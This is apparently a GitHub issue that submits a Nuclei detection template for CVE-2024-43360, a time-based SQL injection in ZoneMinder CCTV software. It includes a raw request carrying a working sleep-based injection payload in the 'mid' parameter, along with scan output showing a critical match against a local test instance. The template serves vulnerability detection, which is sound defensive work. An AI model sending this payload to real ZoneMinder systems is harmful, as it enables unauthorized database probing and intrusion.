You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
ZoneMinder is a free, open source Closed-circuit television software application developed for Linux which supports IP, USB and Analog cameras. Zoneminder v1.36.33 and v1.37.43 are affected by a SQL Injection vulnerability. Advisory link below GHSA-9cmr-7437-v9fj
Nuclei Template:
id: CVE-2024-43360info:
name: ZoneMinder time based sql injection detectionauthor: securitytatersseverity: Criticaldescription: | Zoneminder v1.36.33 and v1.37.43 are affected by a SQL Injection vulnerability.reference:
- http://tags: cve2024,cve,zoneminder,sqlivariables:
username: ''http:
- raw:
- | @timeout: 20s GET /index.php?limit=20&mid=(select*from(select(sleep(14)))a)&order=desc&request=watch&sort=Id&view=request HTTP/1.1 Host: {{Hostname}}matchers-condition: andmatchers:
- type: dsldsl:
- 'duration>=14'
- 'status_code == 200'
- 'contains_all(body,"{\"result\":\"Ok\",\"rows\":[")'
- 'contains_all(content_type,"application/json")'condition: and
Template results
[VER] Started metrics server at localhost:9092
[WRN] Found 32 template[s] loaded with deprecated paths, update before v3 for continued support.
[INF] Current nuclei version: v3.3.1 (outdated)
[INF] Current nuclei-templates version: v9.9.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 56
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[VER] [CVE-2024-43360] Sent HTTP request to http://localhost:8000/index.php?limit=20&mid=(select*from(select(sleep(14)))a)&order=desc&request=watch&sort=Id&view=request
[CVE-2024-43360] [http] [critical] http://localhost:8000/index.php?limit=20&mid=(select*from(select(sleep(14)))a)&order=desc&request=watch&sort=Id&view=request
Template Information:
ZoneMinder is a free, open source Closed-circuit television software application developed for Linux which supports IP, USB and Analog cameras. Zoneminder v1.36.33 and v1.37.43 are affected by a SQL Injection vulnerability. Advisory link below
GHSA-9cmr-7437-v9fj
Nuclei Template:
Template results
Sample response
The text was updated successfully, but these errors were encountered: